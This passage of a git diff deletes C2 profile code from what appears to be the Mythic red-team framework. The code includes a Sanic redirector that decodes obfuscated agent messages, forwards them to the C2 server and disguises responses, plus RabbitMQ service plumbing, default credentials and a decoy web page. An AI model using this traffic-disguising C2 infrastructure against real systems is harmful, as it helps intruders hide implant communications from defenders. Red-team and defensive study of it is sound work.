-async def choose_random(*args): - # called with choose_random(value, opt1, opt2, opt3...) - choice = random.choice(args[1:]) - return args[0] + choice - - -async def r_choose_random(*args): - # called with choose_random(value, opt1, opt2, opt3...) - for e in args[1:]: - if e in args[0]: - return args[0].replace(e, "", 1) - - -async def get_value(value, transforms): - # given an obfuscated value, apply transforms to get back the value we need - # await print_flush(transforms) - for step in transforms[::-1]: - value = await globals()["r_" + step['function']](value, *step['parameters']) - return value - - -async def create_value(value, transforms): - for step in transforms: - # await print_flush("in create_value: value: {}\n".format(value)) - value = await globals()[step['function']](value, *step['parameters']) - return value - - -async def create_response(request, data, status=200, method="POST"): - try: - if config[request.app.name]['debug']: - await print_flush("calling create_value for data: {}\nwith transforms: {}\n".format(data, config[request.app.name][method]['ServerBody'])) - data = await create_value(data, config[request.app.name][method]['ServerBody']) - - headers = config[request.app.name][method]['ServerHeaders'] - - cookies = config[request.app.name][method]['ServerCookies'] - if config[request.app.name]['debug']: - await print_flush("response of: {}".format(data)) - await print_flush("response data: {}\n".format(data)) - await print_flush("response headers: {}\n".format(headers)) - await print_flush("response_cookies: {}\n".format(cookies)) - if isinstance(data, str): - data = data.encode() - response = raw(data, status=status, headers=headers) - for key in cookies.items(): - response.cookies[key] = cookies[key] - return response - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("error in create_response: {}".format(str(e))) - return html("Error: Requested URL {} not found\n".format(request.url), status=404) - - -async def no_match(request, exception): - global config - if config[request.app.name]['debug']: - await print_flush("hit a 'no_match' case") - if config[request.app.name]['no_match']['action'] == "": - return await create_response(request, data="Error: Requested URL {} not found".format(request.url), status=404) - elif config[request.app.name]['no_match']['action'] == 'redirect': - return redirect(config[request.app.name]['no_match']['redirect']) - elif config[request.app.name]['no_match']['action'] == 'proxy_get': - resp = requests.get(config[request.app.name]['no_match']['proxy_get']['url'], verify=False) - return await create_response(request, data=resp.content, status=config[request.app.name]['no_match']['proxy_get']['status']) - elif config[request.app.name]['no_match']['action'] == 'proxy_post': - resp = requests.post(config[request.app.name]['no_match']['proxy_post']['url'], data=request.body, verify=False) - return await create_response(request, data=resp.content, status=config[request.app.name]['no_match']['proxy_post']['status']) - elif config[request.app.name]['no_match']['action'] == 'return_file': - content = open(config[request.app.name]['no_match']['return_file']['name'], 'r').read() - return await create_response(request, data=content, status=config[request.app.name]['no_match']['return_file']['status']) - - -async def print_flush(message): - print(message) - sys.stdout.flush() - - -async def get_base_values(request, method: str, mythic_endpoint: str, **kwargs): - value = None - transforms = None - try: - if config[request.app.name][method][mythic_endpoint]['location'] == 'URI': - value = kwargs["message"] - transforms = {} - elif config[request.app.name][method][mythic_endpoint]['location'] == 'QueryParameters': - value = request.args[config[request.app.name][method][mythic_endpoint]['value']['name']][0] - transforms = config[request.app.name][method][mythic_endpoint]['value']['transforms'] - elif config[request.app.name][method][mythic_endpoint]['location'] == 'Cookies': - value = request.cookies.get(config[request.app.name][method][mythic_endpoint]['value']['name']) - transforms = config[request.app.name][method][mythic_endpoint]['value']['transforms'] - elif config[request.app.name][method][mythic_endpoint]['location'] == 'Body': - value = request.body - transforms = config[request.app.name][method][mythic_endpoint]['value'] - else: - if config[request.app.name]['debug']: - await print_flush("{} failed to find required parameter".format(mythic_endpoint)) - return None, None - if config[request.app.name]['debug']: - await print_flush("Got value: {}\nGot transforms: {}\n".format(value, transforms)) - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("Failed to get a value: {}, {}".format(mythic_endpoint, str(e))) - return value, transforms - - -async def get_agent_message(request, **kwargs): - global config - try: - if config[request.app.name]['debug']: - await print_flush("get_agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers)) - # find the agent value and the transforms needed to get the real value out - message, transforms = await get_base_values(request, 'GET', request.uri_template, **kwargs) - if message is None: - # this means we failed to find our message - return await no_match(request, NotFound) - # given the message location and transforms, extract the actual value - message = await get_value(message, transforms) - if config[request.app.name]['debug']: - await print_flush("Forwarding along to: {}".format(config['mythic_address'])) - response = requests.post(config['mythic_address'], verify=False, data=message) - return await create_response(request, data=response.content, status=response.status_code, method="GET") - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("error in get_agent_message: {}".format(str(e))) - return await no_match(request, NotFound) - - -async def post_agent_message(request, **kwargs): - global config - try: - if config[request.app.name]['debug']: - await print_flush("post_agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers)) - message, agent_transforms = await get_base_values(request, 'POST', request.uri_template, **kwargs) - if message is None: - return await no_match(request, NotFound) - message = await get_value(message, agent_transforms) - if config[request.app.name]['debug']: - await print_flush("Forwarding along to: {}".format(config['mythic_address'])) - response = requests.post(config['mythic_address'], data=message, verify=False) - return await create_response(request, data=response.content, status=response.status_code, method="POST") - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("error in post_agent_message: {}".format(str(e))) - return await no_match(request, NotFound) - - -if __name__ == "__main__": - config_file = open("config.json", 'rb') - main_config = json.loads(config_file.read().decode('utf-8')) - print("Opening config and starting instances...") - sys.stdout.flush() - # basic mapping of the general endpoints to the real endpoints - config['mythic_address'] = os.environ['MYTHIC_ADDRESS'] - # now look at the specific instances to start - for inst in main_config['instances']: - config[str(inst['port'])] = {'debug': inst['debug'], - 'no_match': inst['no_match'], - 'POST': { # these are server response configurations - 'ServerHeaders': inst['POST']['ServerHeaders'], - 'ServerCookies': inst['POST']['ServerCookies'], - 'ServerBody': inst['POST']['ServerBody'] - }, - "GET": { # these are server response configurations - 'ServerHeaders': inst['GET']['ServerHeaders'], - 'ServerCookies': inst['GET']['ServerCookies'], - 'ServerBody': inst['GET']['ServerBody'] - }} - if inst['debug']: - print("Debugging output is enabled. This might be a performance it, but gives more context") - else: - print("Debugging output is disabled") - sys.stdout.flush() - # now to create an app instance too handle responses - app = Sanic(str(inst['port'])) - app.config['REQUEST_MAX_SIZE'] = 1000000000 - app.config['REQUEST_TIMEOUT'] = 600 - app.config['RESPONSE_TIMEOUT'] = 600 - app.error_handler.add(Exception, no_match) - - # do a little extra processing here once so we don't have to do extra processing for each request - # for each endpoint need to track: - # 1. where the data is located (URI, query, cookie, body, header) - # 2. what needs to be done to access the value - # (access specific field, certain offset into data, decode first, etc) - # 3. what needs to be done to get the final value out (decode, remove extra data, etc) - - # an instance can have multiple URLs and schemes for each GET/POST, so loop through all of that - for g in inst['GET']['AgentMessage']: - app.add_route(get_agent_message, g['uri'], methods=['GET']) - config[str(inst['port'])]['GET'][g['uri']] = {} - # we need to find where the "message" parameter exists so we know where the data will be - for p in g['QueryParameters']: - if p['value'] == "message": - config[str(inst['port'])]['GET'][g['uri']]['location'] = "QueryParameters" - config[str(inst['port'])]['GET'][g['uri']]['value'] = p - for p in g['Cookies']: - if p['value'] == 'message': - config[str(inst['port'])]['GET'][g['uri']]['location'] = "Cookies" - config[str(inst['port'])]['GET'][g['uri']]['value'] = p - for p in g['urlFunctions']: - if p['name'] == '': - config[str(inst['port'])]['GET'][g['uri']]['location'] = "URI" - config[str(inst['port'])]['GET'][g['uri']]['value'] = p - if 'location' not in config[str(inst['port'])]['GET'][g['uri']]: - # if we haven't set it yet, data must be in the body - config[str(inst['port'])]['GET'][g['uri']]['location'] = "Body" - config[str(inst['port'])]['GET'][g['uri']]['value'] = g['Body'] - for g in inst['POST']['AgentMessage']: - app.add_route(post_agent_message, g['uri'], methods=['POST']) - config[str(inst['port'])]['POST'][g['uri']] = {} - # we need to find where the "message" parameter exists so we know where the data will be - for p in g['QueryParameters']: - if p['value'] == "message": - config[str(inst['port'])]['POST'][g['uri']]['location'] = "QueryParameters" - config[str(inst['port'])]['POST'][g['uri']]['value'] = p - for p in g['Cookies']: - if p['value'] == 'message': - config[str(inst['port'])]['POST'][g['uri']]['location'] = "Cookies" - config[str(inst['port'])]['POST'][g['uri']]['value'] = p - for p in g['urlFunctions']: - if p['name'] == '': - config[str(inst['port'])]['POST'][g['uri']]['location'] = "URI" - config[str(inst['port'])]['POST'][g['uri']]['value'] = p - if 'location' not in config[str(inst['port'])]['POST'][g['uri']]: - # if we haven't set it yet, data must be in the body - config[str(inst['port'])]['POST'][g['uri']]['location'] = "Body" - config[str(inst['port'])]['POST'][g['uri']]['value'] = g['Body'] - - keyfile = Path(inst['key_path']) - certfile = Path(inst['cert_path']) - if keyfile.is_file() and certfile.is_file(): - context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH) - context.load_cert_chain(inst['cert_path'], keyfile=inst['key_path']) - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=False) - if inst['debug']: - print("using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - else: - if inst['debug']: - print("not using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=False) - task = asyncio.ensure_future(server) - - try: - loop = asyncio.get_event_loop() - def callback(fut): - try: - fetch_count = fut.result() - except OSError as e: - print("probably the port set is being used") - fut.get_loop().stop() - task.add_done_callback(callback) - loop.run_forever() - except: - loop.stop() \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/mythic/C2ProfileBase.py b/C2_Profiles/dynamicHTTP/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/dynamicHTTP/mythic/MythicBaseRPC.py b/C2_Profiles/dynamicHTTP/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/dynamicHTTP/mythic/MythicCallbackRPC.py b/C2_Profiles/dynamicHTTP/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/C2_Profiles/dynamicHTTP/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/dynamicHTTP/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index 6332e7fc2..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/mythic/c2_functions/dynamicHTTP.py b/C2_Profiles/dynamicHTTP/mythic/c2_functions/dynamicHTTP.py deleted file mode 100644 index 084e80073..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/c2_functions/dynamicHTTP.py +++ /dev/null @@ -1,18 +0,0 @@ -from C2ProfileBase import * - - -class DynamicHTTP(C2Profile): - name = "dynamicHTTP" - description = "Manipulate HTTP(S) requests and responses" - author = "@its_a_feature_" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="AESPSK", description="Base64 of a 32B AES Key", default_value="" - ), - C2ProfileParameter( - name="raw_c2_config", description="Agent JSON Config", default_value="" - ), - ] diff --git a/C2_Profiles/dynamicHTTP/mythic/c2_service.sh b/C2_Profiles/dynamicHTTP/mythic/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/C2_Profiles/dynamicHTTP/mythic/mythic_service.py b/C2_Profiles/dynamicHTTP/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." + pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! " + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/dynamicHTTP/mythic/rabbitmq_config.json b/C2_Profiles/dynamicHTTP/mythic/rabbitmq_config.json deleted file mode 100755 index 08581c01a..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/rabbitmq_config.json +++ /dev/null @@ -1,8 +0,0 @@ -{ - "username": "mythic_user", - "password": "mythic_password", - "virtual_host": "mythic_vhost", - "host": "127.0.0.1", - "name": "hostname", - "container_files_path": "/Mythic/" -} \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/Dockerfile b/C2_Profiles/leviathan-websocket/Dockerfile deleted file mode 100755 index beabdbb2f..000000000 --- a/C2_Profiles/leviathan-websocket/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 diff --git a/C2_Profiles/leviathan-websocket/c2_code/config.json b/C2_Profiles/leviathan-websocket/c2_code/config.json deleted file mode 100755 index e61625ddd..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/config.json +++ /dev/null @@ -1,10 +0,0 @@ -{ - "bindaddress": "0.0.0.0:8081", - "usessl": false, - "sslkey":"", - "sslcert":"", - "websocketuri": "socket", - "defaultpage": "index.html", - "logfile": "server.log", - "debug": false -} diff --git a/C2_Profiles/leviathan-websocket/c2_code/index.html b/C2_Profiles/leviathan-websocket/c2_code/index.html deleted file mode 100755 index 49f0e897f..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/index.html +++ /dev/null @@ -1,9 +0,0 @@ - - - -Under Construction - - -

This page is under construction. Please come back soon!

- - \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/c2_code/server b/C2_Profiles/leviathan-websocket/c2_code/server deleted file mode 100755 index 3b371a7ec..000000000 Binary files a/C2_Profiles/leviathan-websocket/c2_code/server and /dev/null differ diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/build_help b/C2_Profiles/leviathan-websocket/c2_code/src/build_help deleted file mode 100644 index 2e0c93ad7..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/build_help +++ /dev/null @@ -1,8 +0,0 @@ -To build the sever: - -go get github.com/gorilla/websocket -go get github.com/kabukky/httpscerts -go build -tags=websocket main.go - -this outputs a binary called "main" -move this to ../server \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/main.go b/C2_Profiles/leviathan-websocket/c2_code/src/main.go deleted file mode 100644 index 315276faa..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/main.go +++ /dev/null @@ -1,35 +0,0 @@ -package main - -import ( - "encoding/json" - "io/ioutil" - "log" - "os" - - "./pkg/servers" -) - -var cf *os.File -func main() { - cf, err := os.Open("config.json") - - if err != nil 